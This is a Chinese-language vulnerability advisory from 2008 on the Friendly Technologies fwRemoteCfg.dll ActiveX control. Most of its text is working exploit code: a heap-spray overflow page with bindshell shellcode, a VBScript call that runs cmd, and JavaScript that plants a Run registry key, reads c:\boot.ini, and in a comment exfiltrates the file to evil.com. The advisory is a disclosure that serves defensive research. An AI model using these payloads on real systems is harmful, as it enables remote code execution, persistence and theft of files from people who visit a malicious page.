安全研究
安全漏洞
Friendly Technologies fwRemoteCfg.dll控件多个远程漏洞
发布日期:2008-08-30
更新日期:2008-09-01
受影响系统:
Friendly Technologies fwRemoteCfg.dll描述:
BUGTRAQ ID: 30940,30939,30891,30889
CVE(CAN) ID: CVE-2008-4048,CVE-2008-4049,CVE-2008-4050
Friendly Technologies是一款提供类似L2TP和PPPoE客户端的解决方案。
Friendly Technologies拨号程序所提供的fwRemoteCfg.dll控件(clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B)没有正确地验证某些用户提供参数,如果用户受骗访问了恶意网页的话,就可能触发缓冲区溢出,或导致泄露敏感信息或非法修改注册表。
<*来源:spdr (spdr01@gmail.com)
链接:http://secunia.com/advisories/31644/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<title>Friendly Technologies - wayyy too friendly...</title>
<object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B" id="sucker"></object>
<input type="button" value="Exploit!" onClick="exploit()">
<script>
function exploit() {
var Evil = ""; // Our Evil Buffer
var DamnIE = "\x0C\x0C\x0C\x0C"; // Damn IE changes address when not in the 0x00 - 0x7F range :(
// Need to use heap spray rather than overwrite EIP ...
// Skyland win32 bindshell (28876/tcp) shellcode
var ShellCode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
var payLoadSize = ShellCode.length * 2; // Size of the shellcode
var SprayToAddress = 0x0C0C0C0C; // Spray up to there, could make it shorter.
var spraySlide = unescape("%u9090%u9090"); // Nop slide
var heapHdrSize = 0x38; // size of heap header blocks in MSIE, hopefully.
var BlockSize = 0x100000; // Size of each block
var SlideSize = BlockSize - (payLoadSize + heapHdrSize); // Size of the Nop slide
var heapBlocks = (SprayToAddress - 0x100000) / BlockSize; // Number of blocks
spraySlide = MakeNopSlide(spraySlide, SlideSize); // Create our slide
// [heap header][nopslide][shellcode]
memory = new Array();
for (k = 0; k < heapBlocks; k++)
memory[k] = spraySlide + ShellCode;
// Create Evil Buffer
while(Evil.length < 800)
Evil += "A";
Evil += DamnIE;
// Pwn
sucker.CreateURLShortcut("con", "con", Evil, 1); // Using 'con' as filename, we dont really want to make a file.
}
function MakeNopSlide(spraySlide, SlideSize){
while(spraySlide.length * 2 < SlideSize)
spraySlide += spraySlide;
spraySlide = spraySlide.substring(0, SlideSize / 2);
return spraySlide;
}
</script>
</html>
<html>
<object classid='clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B' id='lamers' ></object>
<script language='vbscript'>
lamers.RunApp "cmd" ,"cmd /k echo So Simple, So Lame -- Somebody should get fired." ,0
</script>
<html>
<title>Friendly Technologies - Read/Write Registry</title>
<object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B" id='FT'></object>
<script language='Javascript'>
// Write to Registry
FT.RegistryValue (1, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "Key Name Here", 1) = "Input Here";
// Read from Registry
var readreg = FT.RegistryValue (1, "SOFTWARE\\Friendly Technologies\\FriendlyWeb Dialer", "Version", 1);
alert(readreg);
// Read from file
var readme=FT.GetTextFile("c:\\boot.ini");
alert(readme); // <img src="http://evil.com/postfiles.php?input="+readme ...
</script>
建议:
厂商补丁:
Friendly Technologies
---------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.friendly-tech.com/default.asp
浏览次数:2556
严重程度:0(网友投票)
绿盟科技给您安全的保障